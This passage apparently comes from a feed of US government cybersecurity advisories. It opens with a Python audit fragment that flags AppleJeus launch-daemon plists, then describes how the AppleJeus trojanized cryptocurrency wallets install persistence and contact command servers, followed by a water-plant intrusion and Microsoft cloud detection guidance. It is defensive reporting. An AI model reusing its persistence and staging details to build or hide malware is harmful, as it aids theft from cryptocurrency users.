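# Constructed samples modelled on the advisory's descriptions.
SAMPLE_PLISTS = {
    ".vip.unioncrypto.plist": plistlib.dumps({
        "Label": "vip.unioncrypto",
        "ProgramArguments": ["/Library/UnionCrypto/unioncryptoupdater"],
        "RunAtLoad": True,
    }),
    "com.kupay.pkg.wallet.plist": plistlib.dumps({
        "Label": "com.kupay.pkg.wallet",
        "ProgramArguments": ["/Library/Application Support/KupayDaemon/kupay_upgrade"],
        "RunAtLoad": True,
    }),
    "com.example.backupd.plist": plistlib.dumps({   # benign daemon for contrast
        "Label": "com.example.backupd",
        "Program": "/usr/local/libexec/backupd",
        "RunAtLoad": True,
    }),
}


def audit_samples() -> Dict[str, List[str]]:
    """Run the audit over the constructed samples."""
    return {name: audit_plist(name, raw) for name, raw in SAMPLE_PLISTS.items()}


if __name__ == "__main__":
    for name, findings in audit_samples().items():
        print(name, "->", findings or "clean")
```

On a live host, audit_directory() needs no root: /Library/LaunchDaemons is world-readable. The name-based indicator is the weakest check, since a new campaign only has to pick a new label; the location checks (RunAtLoad plus a binary outside the expected directories, or under /Library/Application Support) are the ones that survive a rename.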
Payload

The Windows malware’s payload could not be downloaded because the C2 server is no longer accessible, and none of the open-source reporting for this sample contained copies of the payload. The Windows payload is likely similar in functionality to the macOS X stage 2 described below.

The stage 2 payload for the macOS X malware was no longer available from the specified download URL. However, a file was submitted to VirusTotal by the same user on the same date as the macOS X CoinGoTradeUpgradeDaemon, which suggests that the submitted file may be related to the macOS X version of the malware and to the downloaded payload. The file, prtspool, is a 64-bit Mach-O executable with a wide range of capabilities, all of which were confirmed to be functional. The file has three C2 URLs hardcoded into it and communicates with them using HTTP POST requests carrying multipart/form-data with a boundary string. Like other HIDDEN COBRA malware, prtspool uses format strings to store the data collected about the system and sends it to the C2s.

For more details on AppleJeus Version 5: CoinGoTrade, see MAR-10322463-5.v1.

AppleJeus Version 6: Dorusio

Introduction and Infrastructure

In March 2020, an additional version of the AppleJeus malware was identified. This time the malware was marketed and distributed by a legitimate-looking company called Dorusio on its website, dorusio[.]com (Acquire Infrastructure: Domain [T1583.001]). Researchers collected samples of the Windows and macOS X versions of the Dorusio Wallet (Develop Capabilities: Malware [T1587.001]). As of at least early 2020, the actual download links return 404 errors. The download page has release notes with version revisions claiming to start with version 1.0.0, released on April 15, 2019. The domain dorusio[.]com resolved to IP address 198.54.115[.]51 from March 30, 2020, to January 23, 2021. The IP address is controlled by NameCheap Inc. (ASN 22612) and is located in Atlanta, GA.
It is in the same ASN as the IP addresses for CoinGoTrade[.]com and Ants2Whale[.]com. The domain dorusio[.]com had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak verification level that only proves control of the domain and does not require validation of the owner’s identity or of the business’s existence.

Dorusio Application Analysis

Windows Program

The Windows version of the malicious application is an MSI Installer. The installer appears to be legitimate and executes the following actions:
  • Installs Dorusio.exe in folder C:\Program Files (x86)\Dorusio
  • Installs DorusioUpgrade.exe in folder C:\Users\<username>\AppData\Roaming\DorusioSupport
  • Runs DorusioUpgrade.exe

The program Dorusio.exe loads a legitimate-looking cryptocurrency wallet platform with no signs of malicious activity and is a copy of an open-source cryptocurrency application.

The program DorusioUpgrade.exe first installs itself as a service (Create or Modify System Process: Windows Service [T1543.003]) that will start automatically when any user logs on (Boot or Logon Autostart Execution [T1547]). The service is installed with a description stating it is an “Automatic Dorusio Upgrade.” When launched, it collects the victim’s host information (System Owner/User Discovery [T1033]), combines the information into strings before exfiltration, and sends it to a C2 website (Exfiltration Over C2 Channel [T1041]).

macOS X Program

The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate, and the user is warned of that before installation. The installer executes the following actions:
  • Installs Dorusio in folder /Applications/Dorusio.app/Contents/MacOS/
  • Installs Dorusio_upgrade in folder /Applications/Dorusio.app/Contents/MacOS/
  • Executes a postinstall script
  • Creates the DorusioDaemon folder in /Library/Application Support
  • Moves Dorusio_upgrade to the new folder
  • Moves com.dorusio.pkg.wallet.plist to folder /Library/LaunchDaemons/
  • Runs Dorusio_upgrade in the background

The Dorusio program is likely a copy of an open-source cryptocurrency wallet application and loads a legitimate-looking, fully functional wallet program. Aside from the Dorusio logo and two new services, the wallet appears to be the same as the Kupay Wallet; it seems to be a modification of the open-source wallet Copay, distributed by the Atlanta-based company BitPay.

The Dorusio_upgrade program calls its function CheckUpdate (which contains most of the malware’s logic) and sends a POST to the C2 server with a connection named “Dorusio Wallet 2.1.0 (Check Update Osx)” (Application Layer Protocol: Web Protocols [T1071.001]). If the C2 server returns a file, it is decoded and written to the victim’s folder /private/tmp/Dorusio_update with permissions set by the command chmod 700 (only the owner can read, write, and execute) (Command and Scripting Interpreter [T1059]). Stage 2 is then launched, and Dorusio_upgrade returns to sleeping and checking in with the C2 server at predetermined intervals (Application Layer Protocol: Web Protocols [T1071.001]).

The postinstall script has similar functionality to the other AppleJeus scripts (Command and Scripting Interpreter: Unix Shell [T1059.004]). It creates the DorusioDaemon folder in /Library/Application Support and then moves Dorusio_upgrade to the new folder. It moves the property list (plist) file com.dorusio.pkg.wallet.plist from the Installer package to the /Library/LaunchDaemons/ folder (Scheduled Task/Job: Launchd [T1053.004]).
Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches Dorusio_upgrade and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]).

Payload

Neither the Windows nor the macOS X payload could be downloaded, because the C2 server is no longer accessible. The payloads are likely similar in functionality to the macOS X stage 2 from CoinGoTrade and Kupay Wallet, or to the Windows stage 2 from Union Crypto.

For more details on AppleJeus Version 6: Dorusio, see MAR-10322463-6.v1.

AppleJeus 4, 5, and 6 Installation Conflicts

If a user attempts to install the Kupay Wallet, CoinGoTrade, and Dorusio applications on the same system, they will encounter installation conflicts.

If Kupay Wallet is already installed on a system and the user tries to install CoinGoTrade or Dorusio:
  • Pop-up windows appear, stating that a more recent version of the program is already installed.

If CoinGoTrade is already installed on a system and the user attempts to install Kupay Wallet:
  • Kupay.exe is installed in the C:\Program Files (x86)\CoinGoTrade\ folder.
  • All CoinGoTrade files are deleted.
  • The folders and files in C:\Users\<username>\AppData\Roaming\CoinGoTradeSupport remain installed.
  • KupayUpgrade.exe is installed in the new folder C:\Users\<username>\AppData\Roaming\KupaySupport.

If Dorusio is already installed on a system and the user attempts to install Kupay Wallet:
  • Kupay.exe is installed in the C:\Program Files (x86)\Dorusio\ folder.
  • All Dorusio.exe files are deleted.
  • The folders and files in C:\Users\<username>\AppData\Roaming\DorusioSupport remain installed.
  • KupayUpgrade.exe is installed in the new folder C:\Users\<username>\AppData\Roaming\KupaySupport.
AppleJeus Version 7: Ants2Whale

Introduction and Infrastructure

In late 2020, a new version of AppleJeus, called “Ants2Whale,” was identified. The site for this version is ants2whale[.]com (Acquire Infrastructure: Domain [T1583.001]). The website shows a legitimate-looking cryptocurrency company and application, and it contains multiple spelling and grammar mistakes, indicating that the creator may not have English as a first language. The website states that to download Ants2Whale a user must contact the administrator, as the product is a “premium package” (Develop Capabilities: Malware [T1587.001]).

The domain ants2whale[.]com resolved to IP address 198.54.114[.]237 from September 23, 2020, to January 22, 2021. The IP address is controlled by NameCheap, Inc. (ASN 22612) and is located in Atlanta, GA; it is in the same ASN as the IP addresses for CoinGoTrade[.]com and Dorusio[.]com. The domain ants2whale[.]com had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak verification level that only proves control of the domain and does not require validation of the owner’s identity or of the business’s existence.

Ants2Whale Application Analysis

Windows Program

As of late 2020, the Windows program was not available on VirusTotal. It is likely very similar to the macOS X version described below.

macOS X Program

The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate, and the user is warned of that before installation. The installer executes the following actions:
  • Installs Ants2Whale in folder /Applications/Ants2whale.app/Contents/MacOS/Ants2whale
  • Installs Ants2WhaleHelper in folder /Library/Application Support/Ants2WhaleSupport/
  • Executes a postinstall script
  • Moves com.Ants2whale.pkg.wallet.plist to folder /Library/LaunchDaemons/
  • Runs Ants2WhaleHelper in the background

The Ants2Whale and Ants2WhaleHelper programs and the postinstall script function almost identically to previous versions of AppleJeus and are not discussed in depth in this advisory.

For more details on AppleJeus Version 7: Ants2Whale, see MAR-10322463-7.v1.

ATT&CK Profile

Figure 2 and table 2 summarize the MITRE ATT&CK techniques observed.

Figure 2: MITRE ATT&CK enterprise techniques used by AppleJeus

Table 2: MITRE ATT&CK techniques observed

Tactic Title                  | Technique ID | Technique Title
Resource Development [TA0042] | T1583.001    | Acquire Infrastructure: Domain
Resource Development [TA0042] | T1583.006    | Acquire Infrastructure: Web Services
Resource Development [TA0042] | T1587.001    | Develop Capabilities: Malware
Resource Development [TA0042] | T1588.003    | Obtain Capabilities: Code Signing Certificates
Resource Development [TA0042] | T1588.004    | Obtain Capabilities: Digital Certificates
Initial Access [TA0001]       | T1566.002    | Phishing: Spearphishing Link
Execution [TA0002]            | T1059        | Command and Scripting Interpreter
Execution [TA0002]            | T1059.004    | Command and Scripting Interpreter: Unix Shell
Execution [TA0002]            | T1204.002    | User Execution: Malicious File
Persistence [TA0003]          | T1053.004    | Scheduled Task/Job: Launchd
Persistence [TA0003]          | T1543.004    | Create or Modify System Process: Launch Daemon
Persistence [TA0003]          | T1547        | Boot or Logon Autostart Execution
Privilege Escalation [TA0004] | T1053.005    | Scheduled Task/Job: Scheduled Task
Defense Evasion [TA0005]      | T1027        | Obfuscated Files or Information
Defense Evasion [TA0005]      | T1548        | Abuse Elevation Control Mechanism
Defense Evasion [TA0005]      | T1564.001    | Hide Artifacts: Hidden Files and Directories
Discovery [TA0007]            | T1033        | System Owner/User Discovery
Exfiltration [TA0010]         | T1041        | Exfiltration Over C2 Channel
Command and Control [TA0011]  | T1071.001    | Application Layer Protocol: Web Protocols
Command and Control [TA0011]  | T1573        | Encrypted Channel
Command and Control [TA0011]  | T1573.001    | Encrypted Channel: Symmetric Cryptography

Mitigations

Compromise Mitigations

Organizations that identify AppleJeus malware within their networks should take immediate action. Initial actions should include the following steps:
  • Contact the FBI, CISA, or Treasury immediately regarding any identified activity related to AppleJeus. (Refer to the Contact Information section below.)
  • Initiate your organization’s incident response plan.
  • Generate new keys for wallets, and/or move to new wallets.
  • Introduce a two-factor authentication solution as an extra layer of verification.
  • Use hardware wallets, which keep the private keys in a separate, secured storage area.
  • To move funds out of a compromised wallet:
    ◦ Do not use the trojanized applications listed in this advisory to transfer funds, and
    ◦ Form all transactions offline, then broadcast them to the network all at once in a short online session, ideally before the attacker can access them.
  • Remove impacted hosts from the network.
  • Assume the threat actors have moved laterally within the network and downloaded additional malware.
  • Change all passwords for any accounts associated with impacted hosts.
  • Reimage impacted host(s).
  • Install anti-virus software to run daily deep scans of the host, and ensure it is set up to download the latest signatures daily.
  • Install host-based intrusion detection system (HIDS) software and keep it up to date.
  • Ensure all software and hardware is up to date and all patches have been installed.
  • Ensure a network-based firewall is installed and/or up to date, and that the firewall’s firmware is up to date.

Pro-Active Mitigations

Consider the following recommendations for defense against AppleJeus malware and related activity.
Cryptocurrency Users
  • Verify the source of cryptocurrency-related applications.
  • Use multiple wallets for key storage, striking the appropriate risk balance between hot and cold storage.
  • Use custodial accounts with multi-factor authentication mechanisms for both user and device verification.
  • Patronize cryptocurrency service businesses that offer indemnity protections for lost or stolen cryptocurrency.
  • Consider having a dedicated device for cryptocurrency management.

Financial Service Companies
  • Verify compliance with Federal Financial Institutions Examination Council (FFIEC) handbooks at https://ithandbook.ffiec.gov, especially those related to information security.
  • Report suspicious cyber and financial activities. For more information on mandatory and voluntary reporting of cyber events via suspicious activity reports, see the Financial Crimes Enforcement Network (FinCEN) Advisory FIN-2016-A005: Advisory to Financial Institutions on Cyber-Events and Cyber-Enabled Crime at https://www.fincen.gov/sites/default/files/advisory/2016-10-25/Cyber%20Threats%20Advisory%20-%20FINAL%20508_2.pdf and FinCEN’s Section 314(b) Fact Sheet at https://www.fincen.gov/sites/default/files/shared/314bfactsheet.pdf.

Cryptocurrency Businesses
  • Verify compliance with the Cryptocurrency Security Standard at http://cryptoconsortium.github.io/CCSS/.

All Organizations
  • Incorporate the IOCs identified in CISA’s Malware Analysis Reports on https://us-cert.cisa.gov/northkorea into intrusion detection systems and security alert systems to enable active blocking or reporting of suspected malicious activity.

Table 3 below summarizes preventative ATT&CK mitigations based on the observed techniques.

Table 3: MITRE ATT&CK mitigations based on observed techniques

Mitigation                              | Description
User Training [M1017]                   | Train users to identify social engineering techniques and spearphishing emails.
    - User Training [M1017]: Provide users with the awareness of common phishing and spearphishing techniques and raise suspicion for potentially malicious events.
    - User Account Management [M1018]: Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.
    - User Account Management [M1018]: Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems.
    - SSL/TLS Inspection [M1020]: Use SSL/TLS inspection to see encrypted sessions’ contents to look for network-based indicators of malware communication protocols.
    - Restrict Web-Based Content [M1021]: Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if the activity cannot be monitored well or poses a significant risk.
    - Restrict Web-Based Content [M1021]: Block Script extensions to prevent the execution of scripts and HTA files that may commonly be used during the exploitation process.
    - Restrict Web-Based Content [M1021]: Employ an adblocker to prevent malicious code served up through ads from executing.
    - Restrict File and Directory Permissions [M1022]: Prevent all users from writing to the /Library/StartupItems directory to prevent any startup items from getting registered since StartupItems are deprecated.
    - Privileged Account Management [M1026]: When PowerShell is necessary, restrict PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.
    - Privileged Account Management [M1026]: Configure the Increase Scheduling Priority option only to allow the Administrators group the rights to schedule a priority process.
    - Operating System Configuration [M1028]: Configure settings for scheduled tasks to force tasks to run under the authenticated account’s context instead of allowing them to run as SYSTEM.
    - Network Intrusion Prevention [M1031]: Use network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware and mitigate activity at the network level.
    - Execution Prevention [M1038]: Use application control tools where appropriate.
    - Execution Prevention [M1038]: Use application control tools to prevent the running of executables masquerading as other files.
    - Behavior Prevention on Endpoint [M1040]: Configure endpoint (if possible) to block some process injection types based on common sequences of behavior during the injection process.
    - Disable or Remove Feature or Program [M1042]: Disable or remove any unnecessary or unused shells or interpreters.
    - Code Signing [M1045]: Where possible, only permit the execution of signed scripts.
    - Audit [M1047]: Audit logging for launchd events in macOS can be reviewed or centrally collected using multiple options, such as Syslog, OpenBSM, or OSquery.
    - Audit [M1047]: Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges.
    - Antivirus/Antimalware [M1049]: Use an antivirus program to quarantine suspicious files automatically.

    Contact Information

    Recipients of this report are encouraged to contribute any additional information that they may have related to this threat.
    For any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:

    - The FBI through the FBI Cyber Division (855-292-3937 or CyWatch@fbi.gov) or a local field office,
    - CISA (888-282-0870 or Central@cisa.dhs.gov), or
    - Treasury Office of Cybersecurity and Critical Infrastructure Protection (Treasury OCCIP) (202-622-3000 or OCCIP-Coord@treasury.gov).

    Revisions

    February 17, 2021: Initial Version
    April 15, 2021: Updated MITRE ATT&CK technique from Command and Scripting Interpreter: AppleScript [T1059.002] to Command and Scripting Interpreter: Unix Shell [T1059.004].

  • AA21-042A: Compromise of U.S. Water Treatment Facility
    by CISA on 11 Febbraio 2021 at 7:15 pm

    Original release date: February 11, 2021 | Last revised: February 12, 2021

    Summary

    On February 5, 2021, unidentified cyber actors obtained unauthorized access to the supervisory control and data acquisition (SCADA) system at a U.S. drinking water treatment facility. The unidentified actors used the SCADA system’s software to increase the amount of sodium hydroxide, also known as lye, a caustic chemical, as part of the water treatment process. Water treatment plant personnel immediately noticed the change in dosing amounts and corrected the issue before the SCADA system’s software detected the manipulation and alarmed due to the unauthorized change. As a result, the water treatment process remained unaffected and continued to operate as normal. The cyber actors likely accessed the system by exploiting cybersecurity weaknesses, including poor password security and an outdated operating system. Early information indicates it is possible that desktop sharing software, such as TeamViewer, may have been used to gain unauthorized access to the system, although this cannot be confirmed at present.

    Onsite response to the incident included the Pinellas County Sheriff Office (PCSO), U.S. Secret Service (USSS), and the Federal Bureau of Investigation (FBI).

    The FBI, the Cybersecurity and Infrastructure Security Agency (CISA), the Environmental Protection Agency (EPA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have observed cyber criminals targeting and exploiting desktop sharing software and computer networks running operating systems with end of life status to gain unauthorized access to systems. Desktop sharing software, which has multiple legitimate uses—such as enabling telework, remote technical support, and file transfers—can also be exploited through malicious actors’ use of social engineering tactics and other illicit measures.
    Windows 7 will become more susceptible to exploitation due to lack of security updates and the discovery of new vulnerabilities. Microsoft and other industry professionals strongly recommend upgrading computer systems to an actively supported operating system. Continuing to use any operating system within an enterprise beyond its end of life status may provide cyber criminals access into computer systems.

    Technical Details

    Desktop Sharing Software

    The FBI, CISA, EPA, and MS-ISAC have observed corrupt insiders and outside cyber actors using desktop sharing software to victimize targets in a range of organizations, including those in the critical infrastructure sectors. In addition to adjusting system operations, cyber actors also use the following techniques:

    - Use access granted by desktop sharing software to perform fraudulent wire transfers.
    - Inject malicious code that allows the cyber actors to:
      - Hide desktop sharing software windows,
      - Protect malicious files from being detected, and
      - Control desktop sharing software startup parameters to obfuscate their activity.
    - Move laterally across a network to increase the scope of activity.

    TeamViewer, a desktop sharing software, is a legitimate, popular tool that has been exploited by cyber actors engaged in targeted social engineering attacks, as well as large-scale, indiscriminate phishing campaigns. Desktop sharing software can also be used by employees with vindictive and/or larcenous motivations against employers. Beyond its legitimate uses, when proper security measures aren’t followed, remote access tools may be used to exercise remote control over computer systems and drop files onto victim computers, making them functionally similar to Remote Access Trojans (RATs). TeamViewer’s legitimate use, however, makes anomalous activity less suspicious to end users and system administrators compared to RATs.
    Windows 7 End of Life

    On January 14, 2020, Microsoft ended support for the Windows 7 operating system, which includes security updates and technical support, unless certain customers purchased an Extended Security Update (ESU) plan. The ESU plan is paid per device and available for Windows 7 Professional and Enterprise versions, with an increasing price the longer a customer continues use. Microsoft will only offer the ESU plan until January 2023. Continued use of Windows 7 increases the risk of cyber actor exploitation of a computer system.

    Cyber actors continue to find entry points into legacy Windows operating systems and leverage Remote Desktop Protocol (RDP) exploits. Microsoft released an emergency patch for its older operating systems, including Windows 7, after an information security researcher discovered an RDP vulnerability in May 2019. Since the end of July 2019, malicious RDP activity has increased with the development of a working commercial exploit for the vulnerability. Cyber actors often use misconfigured or improperly secured RDP access controls to conduct cyberattacks. The xDedic Marketplace, taken down by law enforcement in 2019, flourished by compromising RDP vulnerabilities around the world.

    Mitigations

    General Recommendations

    The following cyber hygiene measures may help protect against the aforementioned scheme:

    - Update to the latest version of the operating system (e.g., Windows 10).
    - Use multi-factor authentication.
    - Use strong passwords to protect Remote Desktop Protocol (RDP) credentials.
    - Ensure anti-virus, spam filters, and firewalls are up to date, properly configured, and secure.
    - Audit network configurations and isolate computer systems that cannot be updated.
    - Audit your network for systems using RDP, closing unused RDP ports, applying multi-factor authentication wherever possible, and logging RDP login attempts.
    - Audit logs for all remote connection protocols.
    - Train users to identify and report attempts at social engineering.
    - Identify and suspend access of users exhibiting unusual activity.

    Water and Wastewater Systems Security Recommendations

    The following physical security measures serve as additional protective measures:

    - Install independent cyber-physical safety systems. These are systems that physically prevent dangerous conditions from occurring if the control system is compromised by a threat actor. Examples of cyber-physical safety system controls include:
      - Size of the chemical pump
      - Size of the chemical reservoir
      - Gearing on valves
      - Pressure switches, etc.

    The benefit of these types of controls in the water sector is that smaller systems, with limited cybersecurity capability, can assess their system from a worst-case scenario. The operators can take physical steps to limit the damage. If, for example, cyber actors gain control of a sodium hydroxide pump, they will be unable to raise the pH to dangerous levels.

    Remote Control Software Recommendations

    For a more secure implementation of TeamViewer software:

    - Do not use unattended access features, such as “Start TeamViewer with Windows” and “Grant easy access.”
    - Configure the TeamViewer service to “manual start,” so that the application and associated background services are stopped when not in use.
    - Set random passwords to generate 10-character alphanumeric passwords.
    - If using personal passwords, utilize complex rotating passwords of varying lengths. Note: TeamViewer allows users to change connection passwords for each new session. If an end user chooses this option, never save connection passwords as an option, as they can be leveraged for persistence.
    - When configuring access control for a host, utilize custom settings to tier the access a remote party may attempt to acquire.
    - Require the remote party to receive confirmation from the host to gain any access other than “view only.” Doing so will ensure that, if an unauthorized party is able to connect via TeamViewer, they will only see a locked screen and will not have keyboard control.
    - Utilize the ‘Block and Allow’ list, which enables a user to control which other organizational users of TeamViewer may request access to the system. This list can also be used to block users suspected of unauthorized access.

    Contact Information

    To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov, or your local WMD Coordinator. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov.

    Revisions

    February 11, 2021: Initial Version
    February 12, 2021: Update to PDF File

  • AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments
    by CISA on 8 Gennaio 2021 at 4:36 pm

    Original release date: January 8, 2021 | Last revised: April 15, 2021

    Summary

    This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

    Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a statement from the White House. For more information on SolarWinds-related activity, go to https://us-cert.cisa.gov/remediating-apt-compromised-networks and https://www.cisa.gov/supply-chain-compromise.

    This Alert is a companion alert to AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations. AA20-352A primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products as an initial access vector into networks of U.S. Government agencies, critical infrastructure entities, and private network organizations. As noted in AA20-352A, the Cybersecurity and Infrastructure Security Agency (CISA) has evidence of initial access vectors in addition to the compromised SolarWinds Orion products.

    This Alert also addresses activity—irrespective of the initial access vector leveraged—that CISA attributes to an APT actor. Specifically, CISA has seen an APT actor using compromised applications in a victim’s Microsoft 365 (M365)/Azure environment. CISA has also seen this APT actor utilizing additional credentials and Application Programming Interface (API) access to cloud resources of private and public sector organizations.
    These tactics, techniques, and procedures (TTPs) feature three key components:

    - Compromising or bypassing federated identity solutions;
    - Using forged authentication tokens to move laterally to Microsoft cloud environments; and
    - Using privileged access to a victim’s cloud environment to establish difficult-to-detect persistence mechanisms for Application Programming Interface (API)-based access.

    This Alert describes these TTPs and offers an overview of, and guidance on, available open-source tools—including a CISA-developed tool, Sparrow—for network defenders to analyze their Microsoft Azure Active Directory (AD), Office 365 (O365), and M365 environments to detect potentially malicious activity.

    Note: this Alert describes artifacts—presented by these attacks—from which CISA has identified detectable evidence of the threat actor’s initial objectives. CISA continues to analyze the threat actor’s follow-on objectives.

    Technical Details

    Frequently, CISA has observed the APT actor gaining Initial Access [TA0001] to victims’ enterprise networks via compromised SolarWinds Orion products (e.g., Solorigate, Sunburst).[1] However, CISA is investigating instances in which the threat actor may have obtained initial access by Password Guessing [T1110.001], Password Spraying [T1110.003], and/or exploiting inappropriately secured administrative or service credentials (Unsecured Credentials [T1552]) instead of utilizing the compromised SolarWinds Orion products.

    CISA observed this threat actor moving from user context to administrator rights for Privilege Escalation [TA0004] within a compromised network and using native Windows tools and techniques, such as Windows Management Instrumentation (WMI), to enumerate the Microsoft Active Directory Federated Services (ADFS) certificate-signing capability.
    This enumeration allows threat actors to forge authentication tokens (OAuth) to issue claims to service providers—without having those claims checked against the identity provider—and then to move laterally to Microsoft Cloud environments (Lateral Movement [TA0008]). The threat actor has also used on-premises access to manipulate and bypass identity controls and multi-factor authentication.

    This activity demonstrates how sophisticated adversaries can use credentials from one portion of an organization to move laterally (Lateral Movement [TA0008]) through trust boundaries, evade defenses and detection (Defense Evasion [TA0005]), and steal sensitive data (Collection [TA0009]). This level of compromise is challenging to remediate and requires a rigorous multi-disciplinary effort to regain administrative control before recovering.

    Mitigations

    Detection

    Guidance on identifying affected SolarWinds software is well documented.[2] However—once an organization identifies a compromise via SolarWinds Orion products or other threat actor TTPs—identifying follow-on activity for on-premises networks requires fine-tuned network and host-based forensics. The nature of cloud forensics is unique due to the growing and rapidly evolving technology footprints of major vendors. Microsoft's O365 and M365 environments have built-in capabilities for detecting unusual activity. Microsoft also provides premium services (Advanced Threat Protection [ATP] and Azure Sentinel), which enable network defenders to investigate TTPs specific to the Solorigate activity.[3]

    Detection Tools

    CISA is providing examples of detection tools for informational purposes only. CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services does not constitute or imply their endorsement, recommendation, or favoring by CISA.
    There are a number of open-source tools available to investigate adversary activity in Microsoft cloud environments and to detect unusual activity, service principals, and application activity.[4] Publicly available PowerShell tools that network defenders can use to investigate M365 and Microsoft Azure include:

    - CISA's Sparrow,
    - the open-source utility Hawk, and
    - CrowdStrike's Azure Reporting Tool (CRT).

    Additionally, Microsoft's Office 365 Management API and Graph API provide an open interface for ingesting telemetry and evaluating service configurations for signs of anomalous activity and intrusion.

    Note: these open-source tools are highlighted and explained to assist with on-site investigation and remediation in cloud environments but are not all-encompassing. Open-source tools can be complemented by services such as Azure Sentinel, a Microsoft premium service that provides comprehensive analysis tools, including custom detections for the activity indicated.

    General Guidance on Using Detection Tools

    - Audit the creation and use of service principal credentials. Look for unusual application usage, such as use of dormant applications.
    - Audit the assignment of credentials to applications that allow non-interactive sign-in by the application.
    - Look for unexpected trust relationships added to the Azure Active Directory.
    - Download the interactive sign-ins from the Azure admin portal or use the Microsoft Sentinel product.
    - Review new token validation time periods with high values and investigate whether it was a legitimate change or an attempt to gain persistence by a threat actor.

    Sparrow

    CISA created Sparrow to help network defenders detect possible compromised accounts and applications in the Azure/M365 environment. The tool focuses on the narrow scope of user and application activity endemic to identity- and authentication-based attacks seen recently in multiple sectors. It is neither comprehensive nor exhaustive of available data.
    It is intended to narrow a larger set of available investigation modules and telemetry to those specific to recent attacks on federated identity sources and applications.

    (Updated April 8, 2021): CISA has also created "Aviary," which is a companion Splunk dashboard that can assist in visualizing and reviewing the output of Sparrow. Network defenders can find Aviary on CISA's Sparrow GitHub page.

    CISA advises network defenders to perform the following actions to use Sparrow:

    - Use Sparrow to detect any recent domain authentication or federation modifications. Domain and federation modification operations are uncommon and should be investigated.
    - Examine logs for new and modified credentials applied to applications and service principals; delineate for the credential type. Sparrow can be used to detect the modification of service principals and application credentials.
      - Create a timeline for all credential changes, focusing on recent wholesale changes.
      - Review the “top actors” for activity in the environment and the number of credential modifications performed.
      - Monitor changes in application and service principal credentials.
    - Investigate any instances of excessive permissions being granted, including, but not limited to, Exchange Online, Microsoft Graph, and Azure AD Graph.
    - Use Sparrow to detect privilege escalation, such as adding a service principal, user, or group to a privileged role.
    - Use Sparrow to detect OAuth consent and users’ consent to applications, which is useful for interpreting changes in adversary TTPs.
    - Use Sparrow to identify anomalous Security Assertion Markup Language (SAML) token sign-ins by pivoting on the unified audit log UserAuthenticationValue of 16457, which is an indicator of how a SAML token was built and is a potential indicator for forged SAML tokens. Note that this TTP has not been the subject of significant published security research but may indicate an unusual usage of a token, such as guest access for external partners to M365 resources.
    - Review the PowerShell logs that Sparrow exports.
      - Review PowerShell mailbox sign-ins and validate that the logins are legitimate actions.
      - Review PowerShell usage for users with PowerShell in the environment.
    - Use Sparrow to check the Graph API application permissions of all service principals and applications in M365/Azure AD.
      - Investigate unusual activity regarding Microsoft Graph API permissions (using either the legacy https://graph.windows.net/ or https://graph.microsoft.com). Graph is used frequently as part of these TTPs, often to access and manipulate mailbox resources.
    - Review Sparrow’s listed tenant’s Azure AD domains, to see if the domains have been modified.
    - For customers with G5 or E5 licensing levels, review MailItemsAccessed for insight into what application identification (ID) was used for accessing users’ mailboxes. Use Sparrow to query for a specific application ID using the app id investigation capability, which will check to see if it is accessing mail or file items.
      - The MailItemsAccessed event provides auditability for mailbox data accessed via mail protocols or clients. By analyzing the MailItemsAccessed action, incident responders can determine which user mailbox items have been accessed and potentially exfiltrated by a threat actor. This event will be recorded even in some situations where the message was not necessarily read interactively (e.g., bind or sync).[5]
      - The resulting suspicious application ID can provide incident responders with a pivot to detect other suspicious applications that require additional analysis.
    - Check for changes to applications with regards to the accessing of resources such as mail or file items.

    (Updated April 8, 2021): Aviary can be used to assist with performing the above tasks. To install Aviary, after running Sparrow:

    - Ingest comma separated values (CSV) output from the Sparrow PowerShell script into Splunk.
      Sparrow output will have the following default filenames, which should not be modified: AppUpdate_Operations_Export.csv, AppRoleAssignment_Operations_Export.csv, Consent_Operations_Export.csv, Domain_List.csv, Domain_Operations_Export.csv, FileItems_Operations_Export.csv, MailItems_Operations_Export.csv, PSLogin_Operations_Export.csv, PSMailbox_Operations_Export.csv, SAMLToken_Operations_Export.csv, ServicePrincipal_Operations_Export.csv
    - Copy and paste the contents of the .xml file (aviary.xml in the root directory) into a new dashboard.
    - Use the data selection filters to point to the indexed Sparrow data (see figure 1).

    Figure 1: Data Selection Filters

    Hawk

